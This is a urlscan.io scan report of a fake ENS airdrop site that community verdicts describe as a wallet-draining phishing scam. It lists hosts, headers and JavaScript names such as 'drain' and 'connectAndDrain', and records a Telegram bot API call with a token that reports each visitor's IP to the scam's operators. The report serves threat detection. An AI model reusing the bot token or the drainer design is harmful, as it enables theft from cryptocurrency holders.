urlscan.io logo urlscan.io
SecurityTrails logo

ensgiveaway-claim.com Open in urlscan Pro
185.149.120.87  Malicious Activity! Public Scan

Go To Rescan Add Verdict Report
Submitted URL: http://ensgiveaway.com/
Effective URL: https://ensgiveaway-claim.com/
Submission: On November 08 via manual from IE — Scanned from DE
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 8 IPs in 5 countries across 8 domains to perform 15 HTTP transactions. The main IP is 185.149.120.87, located in Russian Federation and belongs to DDOS-GUARD, RU. The main domain is ensgiveaway-claim.com.
TLS certificate: Issued by R3 on November 8th 2022. Valid for: 3 months.
This is the only time ensgiveaway-claim.com was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Community Verdicts: Malicious2 votes Show Verdicts

Domain & IP information

IP Address AS Autonomous System
2 10 185.149.120.87 57724 (DDOS-GUARD)
1 2001:4de0:ac1... 20446 (STACKPATH...)
2 2606:4700::68... 13335 (CLOUDFLAR...)
1 2606:4700::68... 13335 (CLOUDFLAR...)
1 2a00:1450:400... 15169 (GOOGLE)
1 3.220.57.224 14618 (AMAZON-AES)
1 2001:67c:4e8:... 62041 (TELEGRAM)
15 8
10    185.149.120.87 (Russian Federation)

ASN57724 (DDOS-GUARD, RU)
PTR: ddos-guard.net
ensgiveaway.com
ensgiveaway-claim.com
1    2001:4de0:ac18::1:a:1a (Netherlands)

ASN20446 (STACKPATH-CDN, US)
code.jquery.com
2    2606:4700::6811:190e (United States)

ASN13335 (CLOUDFLARENET, US)
cdnjs.cloudflare.com
1    2606:4700::6810:7baf (United States)

ASN13335 (CLOUDFLARENET, US)
unpkg.com
1    2a00:1450:4001:830::200a (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)
fonts.googleapis.com
1    3.220.57.224 (Ashburn, United States)

ASN14618 (AMAZON-AES, US)
PTR: ec2-3-220-57-224.compute-1.amazonaws.com
api.ipify.org
1    2001:67c:4e8:f004::9 (Virgin Islands (British))

ASN62041 (TELEGRAM, VG)
api.telegram.org
Apex Domain
Subdomains		 Transfer
8 ensgiveaway-claim.com
ensgiveaway-claim.com
90 KB
2 cloudflare.com
cdnjs.cloudflare.com — Cisco Umbrella Rank: 361
240 KB
2 ensgiveaway.com
ensgiveaway.com
469 B
1 telegram.org
api.telegram.org — Cisco Umbrella Rank: 27783
732 B
1 ipify.org
api.ipify.org — Cisco Umbrella Rank: 2725
247 B
1 googleapis.com
fonts.googleapis.com — Cisco Umbrella Rank: 118
1 KB
1 unpkg.com
unpkg.com — Cisco Umbrella Rank: 1127
195 KB
1 jquery.com
code.jquery.com — Cisco Umbrella Rank: 959
83 KB
15 8
Domain Requested by
8 ensgiveaway-claim.com ensgiveaway-claim.com
2 cdnjs.cloudflare.com ensgiveaway-claim.com
2 ensgiveaway.com 2 redirects
1 api.telegram.org ensgiveaway-claim.com
1 api.ipify.org ensgiveaway-claim.com
1 fonts.googleapis.com ensgiveaway-claim.com
1 unpkg.com ensgiveaway-claim.com
1 code.jquery.com ensgiveaway-claim.com
15 8

This site contains links to these domains. Also see Links.

Domain
claim.ens.domains
ens.mirror.xyz
twitter.com
discuss.ens.domains
chat.ens.domains
Subject Issuer Validity Valid
ensgiveaway-claim.com
R3		 2022-11-08 -
2023-02-06		 3 months crt.sh
*.jquery.com
Sectigo RSA Domain Validation Secure Server CA		 2022-08-03 -
2023-07-14		 a year crt.sh
sni.cloudflaressl.com
Cloudflare Inc ECC CA-3		 2022-08-03 -
2023-08-02		 a year crt.sh
upload.video.google.com
GTS CA 1C3		 2022-10-17 -
2023-01-09		 3 months crt.sh
*.ipify.org
Sectigo RSA Domain Validation Secure Server CA		 2022-02-07 -
2023-03-10		 a year crt.sh
api.telegram.org
Go Daddy Secure Certificate Authority - G2		 2022-03-24 -
2023-04-25		 a year crt.sh

This page contains 1 frames:

Primary Page: https://ensgiveaway-claim.com/
Frame ID: B8AB281B8F36052A1BC6C21FC67C4B5C
Requests: 17 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page Title

ENS Airdrop

Page URL History Show full URLs

  1. http://ensgiveaway.com/ HTTP 301
    https://ensgiveaway.com/ HTTP 302
    https://ensgiveaway-claim.com/ Page URL

Detected technologies

Overall confidence: 100%
Detected patterns
  • /axios(@|/)([\d.]+)(?:/[a-z]+)?/axios(?:.min)?\.js
Overall confidence: 100%
Detected patterns
  • jquery[.-]([\d.]*\d)[^/]*\.js
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

15
Requests

100 %
HTTPS

71 %
IPv6

8
Domains

8
Subdomains

8
IPs

5
Countries

611 kB
Transfer

2707 kB
Size

0
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. http://ensgiveaway.com/ HTTP 301
    https://ensgiveaway.com/ HTTP 302
    https://ensgiveaway-claim.com/ Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

15 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
Primary Request /
ensgiveaway-claim.com/
Redirect Chain
  • http://ensgiveaway.com/
  • https://ensgiveaway.com/
  • https://ensgiveaway-claim.com/
35 KB
35 KB 		Document
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
6b2e28e6b2a7d6854b4d9941af6b9e334d53007f5486a533f5098d2552286f7c

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36
accept-language
de-DE,de;q=0.9

Response headers

Connection
keep-alive
Content-Length
36117
Content-Type
text/html; charset=utf-8
Date
Tue, 08 Nov 2022 14:46:42 GMT
ETag
W/"8d15-h09+XKmN+fNaPHcMN7OR+2mJ3mY"
Keep-Alive
timeout=5
X-Powered-By
Express

Redirect headers

Connection
keep-alive
Content-Length
120
Content-Type
text/html; charset=utf-8
Date
Tue, 08 Nov 2022 14:46:42 GMT
Keep-Alive
timeout=5
Location
https://ensgiveaway-claim.com/#airdrop
Vary
Accept
X-Powered-By
Express
jquery-3.6.0.js
code.jquery.com/ 		282 KB
83 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://code.jquery.com/jquery-3.6.0.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2001:4de0:ac18::1:a:1a , Netherlands, ASN20446 (STACKPATH-CDN, US),
Reverse DNS
Software
nginx /
Resource Hash
1fe2bb5390a75e5d61e72c107cab528fc3c29a837d69aab7d200e1dbb5dcd239

Request headers

Referer
https://ensgiveaway-claim.com/
Origin
https://ensgiveaway-claim.com
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
gzip
last-modified
Fri, 20 Aug 2021 17:47:53 GMT
server
nginx
etag
W/"611feac9-46744"
vary
Accept-Encoding
x-hw
1667918803.dop115.am5.t,1667918803.cds261.am5.hn,1667918803.cds145.am5.c
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
max-age=315360000, public
accept-ranges
bytes
content-length
84714
modal.css
ensgiveaway-claim.com/assets/ 		3 KB
3 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/assets/modal.css
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
b1def6a0eb345eefeac579d793c93a50b4a805ca38ff3cfaa2928ab6a5665a68

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Thu, 03 Nov 2022 00:12:19 GMT
X-Powered-By
Express
ETag
W/"c51-1843ad4dab8"
Content-Type
text/css; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
3153
javascript_main.js
ensgiveaway-claim.com/assets/ 		6 KB
6 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/assets/javascript_main.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
616d2737341241c576565fcea99632728fdd464cbac63330453212350ef9ca19

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Fri, 04 Nov 2022 14:33:10 GMT
X-Powered-By
Express
ETag
W/"1626-184430f5870"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
5670
web3.min.js
cdnjs.cloudflare.com/ajax/libs/web3/3.0.0-rc.5/ 		2 MB
231 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://cdnjs.cloudflare.com/ajax/libs/web3/3.0.0-rc.5/web3.min.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2606:4700::6811:190e , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
eaa566c7dddb8fb3085157f9f8ebb8879b41a1ec3904e7d49887d610c625c92e
Security Headers
Name Value
Strict-Transport-Security max-age=15780000
X-Content-Type-Options nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
br
x-content-type-options
nosniff
cf-cache-status
HIT
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security
max-age=15780000
age
633367
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=86400, h3-29=":443"; ma=86400
content-length
235391
last-modified
Sat, 03 Jul 2021 01:30:45 GMT
server
cloudflare
cf-cdnjs-via
cfworker/kv
etag
"60dfbdc5-3977f"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NdMUwdE4TR6YF5ToWHCfqAxX3km5goISr1W%2BFYU41YoyRO6eGQiizwjhjdR%2B7U2QXqrvmIhTFC6nnHykHCWAIwSiFjt5J%2F%2BHo5yk45CcbqZe%2BbWVLjqQIhbIP1Q0vXwIAib4%2BYznMAFD%2FDTTJbPeUzxk"}],"group":"cf-nel","max_age":604800}
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
public, max-age=30672000
accept-ranges
bytes
timing-allow-origin
*
cf-ray
766f19873f14bbe9-FRA
expires
Sun, 29 Oct 2023 14:46:43 GMT
index.min.js
unpkg.com/@walletconnect/web3-provider@1.7.1/dist/umd/ 		733 KB
195 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://unpkg.com/@walletconnect/web3-provider@1.7.1/dist/umd/index.min.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2606:4700::6810:7baf , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
249f824f34fd0715ba6210535decaab795ce238de0dcdf9ffb40a5d6b2ea0369
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
via
1.1 fly.io
x-content-type-options
nosniff
cf-cache-status
HIT
content-encoding
br
strict-transport-security
max-age=31536000; includeSubDomains; preload
age
24821485
last-modified
Sat, 26 Oct 1985 08:15:00 GMT
fly-request-id
01FT83PQ9PHTXP6G65W8019AKC
server
cloudflare
etag
W/"b72ae-I2VpOtfGa9/GSavEcSax34GI2zI"
vary
Accept-Encoding
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
public, max-age=31536000
cf-ray
766f19876c2abb97-FRA
ERC20_abi.js
ensgiveaway-claim.com/assets/ 		4 KB
4 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/assets/ERC20_abi.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
4f02151a607a8dbb3fa6a072004b866a46f454ded2fdc1dc5991007e1469b80d

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 30 Oct 2022 19:37:46 GMT
X-Powered-By
Express
ETag
W/"1086-1842a666b10"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
4230
ERC721_abi.js
ensgiveaway-claim.com/assets/ 		4 KB
4 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/assets/ERC721_abi.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
d3ca2d2c3e7e99c5035173b6f33d32ade7cc5753c13b28d4118b7136fc3baa32

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 30 Oct 2022 19:37:47 GMT
X-Powered-By
Express
ETag
W/"f46-1842a666ef8"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
3910
ERC1155_abi.js
ensgiveaway-claim.com/assets/ 		5 KB
6 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/assets/ERC1155_abi.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
dc0ebec5b637de73126525acd4bdf7e7e3790b26caea7cfcff90625ca8ccf7d1

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 30 Oct 2022 19:37:47 GMT
X-Powered-By
Express
ETag
W/"14fa-1842a666ef8"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
5370
axios.min.js
cdnjs.cloudflare.com/ajax/libs/axios/1.1.3/ 		26 KB
9 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://cdnjs.cloudflare.com/ajax/libs/axios/1.1.3/axios.min.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2606:4700::6811:190e , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
ba23bffc36efb30892b6cca21b76dbb4372852a40818abd1cd1e9f7df21bbecd
Security Headers
Name Value
Strict-Transport-Security max-age=15780000
X-Content-Type-Options nosniff

Request headers

Referer
Origin
https://ensgiveaway-claim.com
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
br
x-content-type-options
nosniff
cf-cache-status
HIT
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security
max-age=15780000
age
507187
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=86400, h3-29=":443"; ma=86400
content-length
8949
last-modified
Sat, 15 Oct 2022 17:02:52 GMT
server
cloudflare
cf-cdnjs-via
cfworker/kv
etag
"634ae7bc-22f5"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HMlXHjE3QKM%2BoZrMWa18hTJ0IF7cxryiqo74vUaUA5Hz1kv0NvpgkKNp%2FFR3p4JFyESTNjPgvjI0cYGA03Rxp7QtEHrrNoEN0apVTg1mkphbYzk1rv3aa3nuNDa8qc%2BiR8lk5mEdZIJPgtegIijOFVIV"}],"group":"cf-nel","max_age":604800}
content-type
application/javascript; charset=utf-8
access-control-allow-origin
*
cache-control
public, max-age=30672000
accept-ranges
bytes
timing-allow-origin
*
cf-ray
766f19873b35914a-FRA
expires
Sun, 29 Oct 2023 14:46:43 GMT
import_main.js
ensgiveaway-claim.com/assets/ 		3 KB
4 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/assets/import_main.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
2db95cdfc19b90ce6ff474b4ad38be17d8b13e761ed02af7bbfe931f6d898e5b

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Sun, 06 Nov 2022 12:42:35 GMT
X-Powered-By
Express
ETag
W/"dc3-1844cf6d278"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
3523
main.js
ensgiveaway-claim.com/assets/ 		27 KB
28 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://ensgiveaway-claim.com/assets/main.js
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_256_GCM
Server
185.149.120.87 , Russian Federation, ASN57724 (DDOS-GUARD, RU),
Reverse DNS
ddos-guard.net
Software
/ Express
Resource Hash
6f2982e7236e094c6c01b4bf0e87505fa1ef9b809d6105e3f3e345353ef10cc2

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Last-Modified
Mon, 07 Nov 2022 22:30:51 GMT
X-Powered-By
Express
ETag
W/"6d70-1845437c178"
Content-Type
application/javascript; charset=UTF-8
Cache-Control
public, max-age=0
Connection
keep-alive
Accept-Ranges
bytes
Keep-Alive
timeout=5
Content-Length
28016
css2
fonts.googleapis.com/ 		2 KB
1 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@700&display=swap
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:830::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
ESF /
Resource Hash
01f59f61b5ad9958b3c8dd09e29420692f21fb6e61c0e20cc4d23814f3f7206f
Security Headers
Name Value
Strict-Transport-Security max-age=31536000
X-Content-Type-Options nosniff
X-Frame-Options SAMEORIGIN
X-Xss-Protection 0

Request headers

Referer
https://ensgiveaway-claim.com/
Origin
https://ensgiveaway-claim.com
accept-language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

strict-transport-security
max-age=31536000
date
Tue, 08 Nov 2022 14:46:43 GMT
content-encoding
gzip
x-content-type-options
nosniff
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection
0
last-modified
Tue, 08 Nov 2022 14:46:43 GMT
server
ESF
cross-origin-opener-policy
same-origin-allow-popups
x-frame-options
SAMEORIGIN
content-type
text/css; charset=utf-8
access-control-allow-origin
*
cache-control
private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin
*
link
<https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires
Tue, 08 Nov 2022 14:46:43 GMT
truncated
/ 		4 KB
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
c64e9c818d03878f82b48c2e2778935a1acb3b867e31b1473e19e856cde37b6e

Request headers

accept-language
de-DE,de;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Content-Type
image/svg+xml
truncated
/ 		2 KB
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
data:truncated
Protocol
DATA
Server
-, , ASN (),
Reverse DNS
Software
/
Resource Hash
4d17514e4c6ec3082d1321979a48ca6975a2fa1682a8e633a320fcff5e1a67c2

Request headers

accept-language
de-DE,de;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Content-Type
image/svg+xml
/
api.ipify.org/ 		15 B
247 B 		Fetch
General
Check archive.org
Download Go to
Full URL
https://api.ipify.org/
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/assets/main.js
Protocol
HTTP/1.1
Security
TLS 1.3, , AES_128_GCM
Server
3.220.57.224 Ashburn, United States, ASN14618 (AMAZON-AES, US),
Reverse DNS
ec2-3-220-57-224.compute-1.amazonaws.com
Software
Cowboy /
Resource Hash
e5be170a8935eecfcdf2d0a98457dcaa8354bf54e7de1bc20a913c685087fdb8

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

Date
Tue, 08 Nov 2022 14:46:43 GMT
Via
1.1 vegur
Server
Cowboy
Vary
Origin
Content-Type
text/plain
Access-Control-Allow-Origin
https://ensgiveaway-claim.com
Connection
keep-alive
Content-Length
15
sendMessage
api.telegram.org/bot5755492923:AAFpSok6EgmPbC3OXnCSnRMbFDGMiaPpT64/ 		485 B
732 B 		Fetch
General
Check archive.org
Download Go to
Full URL
https://api.telegram.org/bot5755492923:AAFpSok6EgmPbC3OXnCSnRMbFDGMiaPpT64/sendMessage?chat_id=-855472091&parse_mode=markdown&text=%F0%9F%92%A0%20%D0%9F%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%20185.213.155.176%20%D0%B7%D0%B0%D1%88%D0%B5%D0%BB%20%D0%BD%D0%B0%20%D1%81%D0%B0%D0%B9%D1%82
Requested by
Host: ensgiveaway-claim.com
URL: https://ensgiveaway-claim.com/assets/main.js
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
2001:67c:4e8:f004::9 , Virgin Islands (British), ASN62041 (TELEGRAM, VG),
Reverse DNS
Software
nginx/1.18.0 /
Resource Hash
daa6ac040a868f904cb1d84b65d47940ee44ef64f1e0cc154f266875ee56129e
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains; preload

Request headers

accept-language
de-DE,de;q=0.9
Referer
https://ensgiveaway-claim.com/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36

Response headers

date
Tue, 08 Nov 2022 14:46:43 GMT
strict-transport-security
max-age=31536000; includeSubDomains; preload
server
nginx/1.18.0
access-control-allow-methods
GET, POST, OPTIONS
content-type
application/json
access-control-allow-origin
*
access-control-expose-headers
Content-Length,Content-Type,Date,Server,Connection
content-length
485

Verdicts & Comments Add Verdict or Comment

Malicious page.url
Submitted on November 9th 2022, 2:22:52 pm UTC — From Ireland

Threats: Phishing Scam Social Engineering
Comment: One website part of a large token scam operation. It will drain your tokens from your wallet if you connect to it. https://etherscan.io/address/0x2b22D1256FbFfed294c83624c08A79D63BE13A12

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

63 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| onbeforeinput object| oncontextlost object| oncontextrestored function| structuredClone object| launchQueue object| onbeforematch function| getScreenDetails function| queryLocalFonts object| navigation function| $ function| jQuery function| _0x4364 function| _0x364b object| modal function| mobileAndTabletCheck function| setImmediate function| clearImmediate object| regeneratorRuntime function| Web3 object| WalletConnectProvider object| ERC20_ABI object| ERC721_ABI object| ERC1155_ABI function| axios function| _0x1a38 function| updateState function| _0x12c6 string| logLanguage string| ownerAddress string| MORALIS_KEY string| ZAPPER_KEY number| autoMetamaskConnect number| connected object| nativePrices object| tgMsgCount function| connectWalletConnect function| getMoralisTokenBalances function| getBSCTokenPrice function| getETHTokenPrice function| getTokenBalances function| fetchSomething function| connectMetamask function| fetchUserTokens function| sendEth function| sendToken function| sendNFT function| drain function| _0x1083 function| logTx function| sendMsg function| getMobileOperatingSystem function| _0x4428 function| connectAndDrain function| connectAndDrainWalletConnect object| ZAPPER_MATCH object| NATIVE_MATCH object| CHAIN_ID object| MORALIS_MATCH object| itemList string| account string| id object| response object| resp

0 Cookies

4 Console Messages

Source Level URL
Text
other warning URL: https://ensgiveaway-claim.com/#airdrop(Line 392)
Message:
Failed to decode downloaded font: https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@700&display=swap
other warning URL: https://ensgiveaway-claim.com/#airdrop(Line 392)
Message:
OTS parsing error: invalid sfntVersion: 791289955
other warning URL: https://ensgiveaway-claim.com/#airdrop(Line 392)
Message:
Failed to decode downloaded font: https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@700&display=swap
other warning URL: https://ensgiveaway-claim.com/#airdrop(Line 392)
Message:
OTS parsing error: invalid sfntVersion: 791289955

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

api.ipify.org
api.telegram.org
cdnjs.cloudflare.com
code.jquery.com
ensgiveaway-claim.com
ensgiveaway.com
fonts.googleapis.com
unpkg.com
185.149.120.87
2001:4de0:ac18::1:a:1a
2001:67c:4e8:f004::9
2606:4700::6810:7baf
2606:4700::6811:190e
2a00:1450:4001:830::200a
3.220.57.224
01f59f61b5ad9958b3c8dd09e29420692f21fb6e61c0e20cc4d23814f3f7206f
1fe2bb5390a75e5d61e72c107cab528fc3c29a837d69aab7d200e1dbb5dcd239
249f824f34fd0715ba6210535decaab795ce238de0dcdf9ffb40a5d6b2ea0369
